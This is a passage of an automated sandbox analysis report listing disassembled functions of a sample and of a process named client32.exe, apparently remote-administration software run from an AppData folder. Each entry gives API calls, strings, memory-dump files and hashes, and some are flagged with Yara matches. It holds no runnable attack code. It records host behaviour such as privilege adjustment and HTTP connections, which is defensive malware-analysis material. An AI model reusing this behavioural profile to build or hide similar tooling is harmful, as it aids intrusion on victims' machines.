GetLastError.KERNEL32(?,00199A53,00000000,?,001B2CE0,?,?,?,00199BF6,00000004,InitializeCriticalSectionEx,001A9D38,InitializeCriticalSectionEx,00000000,?,001999AD), ref: 00199AB9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00199AE1

Strings

api-ms-, xrefs: 00199AC6

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: a9cd01e9e2d7240b3a7889589e42e46f931e0a48dea581b5b7b1f4d88dfafcfb
Instruction ID: e71c42b4f1c120f120b771eda90f28aee8ff0735a67276a933a51f2f805525ca
Opcode Fuzzy Hash: a9cd01e9e2d7240b3a7889589e42e46f931e0a48dea581b5b7b1f4d88dfafcfb
Instruction Fuzzy Hash: 8FE0BF70680305BBEF105BB6EC0AB5A3F69EB52B51F248024F90CA94E1D7A1E9D29694

Function 001A4A9D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(C6C014CA,00000000,00000000,?), ref: 001A4B00

Part of subcall function 001A0654: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001A477B,?,00000000,-00000008), ref: 001A06B5

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001A4D52
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001A4D98
GetLastError.KERNEL32 ref: 001A4E3B

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 73a1a0b1521505feae9293220a91b766c4ae0b4590545684a66f6844139443de
Instruction ID: c1cf6caf06461c18f00f3b4efd9f9dd82e41b89adf2d59a905ecbc4f69570001
Opcode Fuzzy Hash: 73a1a0b1521505feae9293220a91b766c4ae0b4590545684a66f6844139443de
Instruction Fuzzy Hash: BFD18C79E002489FCF15CFE8D880AADBBB4FF5A310F28456AE816EB351D770A945CB50

Function 00198A64 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00198B2B
___AdjustPointer.LIBCMT ref: 00198B4E
___AdjustPointer.LIBCMT ref: 00198BEA

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ba36d95c165fa2f2604bcefcf739f3419e46218c5cdb7062ee153a03f0216824
Instruction ID: 72fe9d2e7bd8b0a5e717c4ff321420dc27b58272a2dc82bc720fa1ac8830a33f
Opcode Fuzzy Hash: ba36d95c165fa2f2604bcefcf739f3419e46218c5cdb7062ee153a03f0216824
Instruction Fuzzy Hash: 2851F3B2601306EFDF299F14D891BAA77A4EF16314F18412DE90797291DF31ED80CB90

Function 001A71B6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,001A6320,00000000,00000001,?,?,?,001A4E8F,?,00000000,00000000), ref: 001A71CD
GetLastError.KERNEL32(?,001A6320,00000000,00000001,?,?,?,001A4E8F,?,00000000,00000000,?,?,?,001A5432,00000000), ref: 001A71D9

Part of subcall function 001A719F: CloseHandle.KERNEL32(FFFFFFFE,001A71E9,?,001A6320,00000000,00000001,?,?,?,001A4E8F,?,00000000,00000000,?,?), ref: 001A71AF

___initconout.LIBCMT ref: 001A71E9

Part of subcall function 001A7161: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001A7190,001A630D,?,?,001A4E8F,?,00000000,00000000,?), ref: 001A7174

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,001A6320,00000000,00000001,?,?,?,001A4E8F,?,00000000,00000000,?), ref: 001A71FE

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e5ee7f1630a68c0d786b438b60c1346812dec783e44f72292f742b4f0c13bd96
Instruction ID: 34bf1d3b2fdbec2709e99837c97b4801b2cedf62229b1b338006e2b2d6ebbfc3
Opcode Fuzzy Hash: e5ee7f1630a68c0d786b438b60c1346812dec783e44f72292f742b4f0c13bd96
Instruction Fuzzy Hash: A3F0AC3A505114BBCF222F95EC04A9E3FAAFB0A3B1F054110FA1895570CB3289A0DB90

Function 00195360 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,?,00000000,00000000,00000000,00000242,?), ref: 001953BA
CloseHandle.KERNEL32(?,00000000,00000242,?), ref: 00195517

Strings

.#v, xrefs: 00195517

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: CloseFileHandlePointer
String ID: .#v
API String ID: 1504453057-507759092
Opcode ID: 39a06be76555cbab95a45b98b0d56c7931704766ed7a2abdf230ab0c45f3f9a6
Instruction ID: 627ced4db5157f0de7e1d6b282aa8d3578fe9f492f703293861e3f9a714a5a84
Opcode Fuzzy Hash: 39a06be76555cbab95a45b98b0d56c7931704766ed7a2abdf230ab0c45f3f9a6
Instruction Fuzzy Hash: 45518271A00B049FEF26DF74C841B9DB7A7AF94304F5485A9E909E7282EB70DA448BC1

Function 00199060 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00199085

Strings

RCC, xrefs: 0019909F
MOC, xrefs: 00199097

Memory Dump Source

Source File: 00000000.00000002.2258118664.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.2258074892.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258141300.00000000001A9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258202139.00000000001B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2258222082.00000000001B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_190000_lFxGd66yDa.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: a64a42766b0390e7ac1889ef551a35818baee86f2537431faaa164bf6bce9a16
Instruction ID: 877631e1b74033dc7fc102b1a7d3bb1431e95a57c11cfb416c12e41e7a71bc0a
Opcode Fuzzy Hash: a64a42766b0390e7ac1889ef551a35818baee86f2537431faaa164bf6bce9a16
Instruction Fuzzy Hash: 91419A7290020AEFCF16DF98CC85AEEBBB5FF48310F1881A9F905A7261D3359951DB51

Analysis Process: client32.exePID: 4412, Parent PID: 5272COMMON

Execution Graph

Execution Coverage:	4.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	77

Executed Functions

Function 1109D240 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1109C4F0: GetCurrentProcess.KERNEL32(000F01FF,?,1102FA03,00000000,00000000,00080000,33E68B52,00080000,00000000,00000000), ref: 1109C51D
Part of subcall function 1109C4F0: OpenProcessToken.ADVAPI32(00000000), ref: 1109C524
Part of subcall function 1109C4F0: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C535
Part of subcall function 1109C4F0: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C559

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,33E68B52,00080000,00000000,00000000), ref: 1109D2D5
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D2EE
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D2F9
GetVersionExA.KERNEL32(?), ref: 1109D310
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D37E
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D393
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D3A4
CreateFileMappingA.KERNEL32(000000FF,1102FA03,00000004,00000000,?,?), ref: 1109D3E0
GetLastError.KERNEL32 ref: 1109D3ED
LocalFree.KERNEL32(?), ref: 1109D416
LocalFree.KERNEL32(?), ref: 1109D423
GetLastError.KERNEL32 ref: 1109D440
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D45E
LocalFree.KERNEL32(?), ref: 1109D489
LocalFree.KERNEL32(?), ref: 1109D496

Part of subcall function 1109C460: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D32E), ref: 1109C468

Part of subcall function 1109C4A0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C4B4

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D4C2
LocalFree.KERNEL32(?), ref: 1109D58B
LocalFree.KERNEL32(?), ref: 1109D598
_memset.LIBCMT ref: 1109D5B0
GetTickCount.KERNEL32 ref: 1109D5B8
GetCurrentProcessId.KERNEL32 ref: 1109D664
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D67F
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D6CB
GetLastError.KERNEL32 ref: 1109D6D4
GetLastError.KERNEL32(00000000), ref: 1109D6DB
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D710
GetLastError.KERNEL32 ref: 1109D719
GetLastError.KERNEL32(00000000), ref: 1109D720
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D756
GetLastError.KERNEL32 ref: 1109D75F
GetLastError.KERNEL32(00000000), ref: 1109D766
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D79B
GetLastError.KERNEL32 ref: 1109D7AA
GetLastError.KERNEL32(00000000), ref: 1109D7AD
LocalFree.KERNEL32(?), ref: 1109D7D5
LocalFree.KERNEL32(?), ref: 1109D7E2
GetCurrentThreadId.KERNEL32 ref: 1109D813
CreateThread.KERNEL32(00000000,00002000,Function_0009CDD0,00000000,00000000,00000030), ref: 1109D82D
ResetEvent.KERNEL32(?), ref: 1109D85C
ResetEvent.KERNEL32(?), ref: 1109D862
ResetEvent.KERNEL32(?), ref: 1109D868
SetEvent.KERNEL32(?), ref: 1109D86E

Strings

Info - reusing existing filemap, xrefs: 1109D529
Error cant create events, xrefs: 1109D897
cant map, xrefs: 1109D498
map exists, xrefs: 1109D59A
S:(ML;;NW;;;LW), xrefs: 1109D338
cant create filemap, xrefs: 1109D425
IPC(%s) created, xrefs: 1109D878
cant create events, xrefs: 1109D8A4
warning map exists, xrefs: 1109D540
Error creating filemap (%d), xrefs: 1109D3F4
Cant create event %s, e=%d (x%x), xrefs: 1109D6E9, 1109D72E, 1109D774, 1109D7B7
SeSecurityPrivilege, xrefs: 1109D2AA
cant create thread, xrefs: 1109D83A
Error filemap exists, xrefs: 1109D56D
Error cant map view, xrefs: 1109D46B

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: 2773d804223ff8e0a2aa968baca401bea7f470192e3e967c4d90a613c88c9993
Instruction ID: 1c086480991888a7e74c242cefb21caf9cc7b937459cab308f9abb1f8f7b4179
Opcode Fuzzy Hash: 2773d804223ff8e0a2aa968baca401bea7f470192e3e967c4d90a613c88c9993
Instruction Fuzzy Hash: 7F1282B5E402599FDB20DF65CCD4EAEB7F9BB88308F0089A9E14D97240D771A984CF61

Function 6C3D7030 Relevance: 91.4, APIs: 21, Strings: 31, Instructions: 406
threadlibrarysynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6C3C2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6C3C2ACB
Part of subcall function 6C3C2A90: _strrchr.LIBCMT ref: 6C3C2ADA
Part of subcall function 6C3C2A90: _strrchr.LIBCMT ref: 6C3C2AEA
Part of subcall function 6C3C2A90: wsprintfA.USER32 ref: 6C3C2B05

Part of subcall function 6C3DDBD0: _malloc.LIBCMT ref: 6C3DDBE9
Part of subcall function 6C3DDBD0: wsprintfA.USER32 ref: 6C3DDC04
Part of subcall function 6C3DDBD0: _memset.LIBCMT ref: 6C3DDC27

LoadLibraryA.KERNEL32(WinInet.dll), ref: 6C3D7057
InitializeCriticalSection.KERNEL32(6C40B898), ref: 6C3D70DF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C3D70EF
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C3D7115
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C3D713B
WSAStartup.WSOCK32(00000101,6C40B91A), ref: 6C3D7167
_malloc.LIBCMT ref: 6C3D71A3

Part of subcall function 6C3E1B69: __FF_MSGBANNER.LIBCMT ref: 6C3E1B82
Part of subcall function 6C3E1B69: __NMSG_WRITE.LIBCMT ref: 6C3E1B89
Part of subcall function 6C3E1B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6C3ED3C1,6C3E6E81,00000001,6C3E6E81,?,6C3EF447,00000018,6C407738,0000000C,6C3EF4D7), ref: 6C3E1BAE

_memset.LIBCMT ref: 6C3D71D3
_calloc.LIBCMT ref: 6C3D7214
_malloc.LIBCMT ref: 6C3D728B
_memset.LIBCMT ref: 6C3D72C1
_malloc.LIBCMT ref: 6C3D72CD
_memset.LIBCMT ref: 6C3D7303
GetTickCount.KERNEL32 ref: 6C3D7361
CreateThread.KERNEL32(00000000,00004000,6C3D6BA0,00000000,00000000,6C40BACC), ref: 6C3D737E
SetThreadPriority.KERNEL32(00000000,00000001), ref: 6C3D73AC
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\DNScache\Support\,00000104), ref: 6C3D7430
GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\user\AppData\Local\DNScache\Support\pci.ini), ref: 6C3D74B0
GetModuleHandleA.KERNEL32(nsmtrace), ref: 6C3D74C0
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6C3D7566
timeBeginPeriod.WINMM(00000001), ref: 6C3D7573

Strings

TraceSend, xrefs: 6C3D74DB, 6C3D7514
TraceFile, xrefs: 6C3D7537
*CMPI, xrefs: 6C3D731F
mode, xrefs: 6C3D74A1
sv.hRecvThreadReadyEvent, xrefs: 6C3D7104
sv.ResumeEvent, xrefs: 6C3D7150
NSM301071, xrefs: 6C3D7257
*DisconnectTimeout, xrefs: 6C3D733A
NetworkSpeed, xrefs: 6C3D73D7
C:\Users\user\AppData\Local\DNScache\Support\, xrefs: 6C3D742A, 6C3D7438, 6C3D744C
TraceRecv, xrefs: 6C3D74CF, 6C3D74FD
sv.subset.subset, xrefs: 6C3D72A6
Trace, xrefs: 6C3D7547
sv.hRecvThread, xrefs: 6C3D7397
124406, xrefs: 6C3D7242
0/#v, xrefs: 6C3D70E5
sv.hResponseEvent, xrefs: 6C3D712A
HTCTL32, xrefs: 6C3D7036
(iflags & CTL_REMOTE) == 0, xrefs: 6C3D73C2
nsmtrace, xrefs: 6C3D74B6
sv.s, xrefs: 6C3D71BE
sv.subset.omit, xrefs: 6C3D72E8
C:\Users\user\AppData\Local\DNScache\Support\pci.ini, xrefs: 6C3D7481, 6C3D749B
pci.ini, xrefs: 6C3D748F
WinInet.dll, xrefs: 6C3D7052
htctl.packet_tracing, xrefs: 6C3D74A8
sv.gateways, xrefs: 6C3D722F
_debug, xrefs: 6C3D7502, 6C3D7519, 6C3D753C, 6C3D754C
e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c, xrefs: 6C3D70FF, 6C3D7125, 6C3D714B, 6C3D71B9, 6C3D722A, 6C3D72A1, 6C3D72E3, 6C3D7392, 6C3D73BD
Support\, xrefs: 6C3D7451
General, xrefs: 6C3D733F

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$0/#v$124406$C:\Users\user\AppData\Local\DNScache\Support\$C:\Users\user\AppData\Local\DNScache\Support\pci.ini$General$HTCTL32$NSM301071$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
API String ID: 3160247386-3211443338
Opcode ID: 6af099ef77eaeb3f94337f89a2e21881924dbd84a48925a25b8d2830d25db418
Instruction ID: 535eb5d89b15a54f999e58d57dbed3d628e076eb01f15b9272822590bcc931cf
Opcode Fuzzy Hash: 6af099ef77eaeb3f94337f89a2e21881924dbd84a48925a25b8d2830d25db418
Instruction Fuzzy Hash: 6CD1C9B2B803449FD720FF659D85E5A7AB8AB0A348B05093DF845D7B41DB31A8448FA7

Function 11029200 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll,33E68B52,762323A0,?,00000000), ref: 11029235
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292CF
SetLastError.KERNEL32(00000078), ref: 110292E3
_malloc.LIBCMT ref: 11029307
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029321
GetLastError.KERNEL32 ref: 11029342
_free.LIBCMT ref: 1102934E
_malloc.LIBCMT ref: 11029357
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029371
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293AB
InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293CA
SetLastError.KERNEL32(00000078), ref: 110293D4
SetLastError.KERNEL32(00000078), ref: 110293E1
SetLastError.KERNEL32(00000078), ref: 110293EB
_free.LIBCMT ref: 110293F5

Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029475
SetLastError.KERNEL32(00000078), ref: 1102948E
GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294A1
InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294BE
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294DA
SetLastError.KERNEL32(00000078), ref: 110294F3
GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029519
GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102956D
GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 110296D3
SetLastError.KERNEL32(00000078), ref: 110297A0
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110297F2
SetLastError.KERNEL32(00000078), ref: 11029809
FreeLibrary.KERNEL32(?), ref: 1102981A

Strings

HttpOpenRequestA, xrefs: 11029513
HttpQueryInfoA, xrefs: 110295B3
WinInet.dll, xrefs: 1102922D
InternetConnectA, xrefs: 1102949B
GET, xrefs: 11029539
HttpSendRequestA, xrefs: 11029567
InternetQueryOptionA, xrefs: 1102931B, 1102936B
InternetQueryDataAvailable, xrefs: 110296CD
InternetErrorDlg, xrefs: 11029610
://, xrefs: 11029415
InternetCloseHandle, xrefs: 110292C9, 1102946F, 110294D4, 110297EC
InternetOpenA, xrefs: 110293A5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
API String ID: 921868004-913974648
Opcode ID: 1c4ce46d0ffb00ce986c6a75ceb3ffa0c21656539bf0748b1eb8fe8b8cff61b2
Instruction ID: 1a6f29b930c56522642f3e0528693d97e2c9ce6eee6fc69bea7c9705341dbda6
Opcode Fuzzy Hash: 1c4ce46d0ffb00ce986c6a75ceb3ffa0c21656539bf0748b1eb8fe8b8cff61b2
Instruction Fuzzy Hash: 3C128EB0D002299BDB11CFA9CC88A9EFBF8FF89344F60856AE555F7240EB745941CB61

Function 110612D0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON

Download Yara Rule

APIs

Part of subcall function 11141240: GetLastError.KERNEL32(?,00000000,7693795C,00000000), ref: 11141275
Part of subcall function 11141240: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,7693795C,00000000), ref: 11141285

_fgets.LIBCMT ref: 11061402
_strpbrk.LIBCMT ref: 11061469
_fgets.LIBCMT ref: 1106156C
_strpbrk.LIBCMT ref: 110615E3
__wcstoui64.LIBCMT ref: 110615FC
_fgets.LIBCMT ref: 11061675
_strpbrk.LIBCMT ref: 1106169B

Strings

product, xrefs: 11061C92
?expirY, xrefs: 11061DA8
start, xrefs: 11061D79, 11061D90
defaults, xrefs: 11061756
cd_install, xrefs: 11061C5B
Expired, xrefs: 11061FAB
inactive, xrefs: 11061BF1
enforce, xrefs: 11061776
ACM, xrefs: 11061CD7
shrink_wrap, xrefs: 11061C76
expiry, xrefs: 11061D70
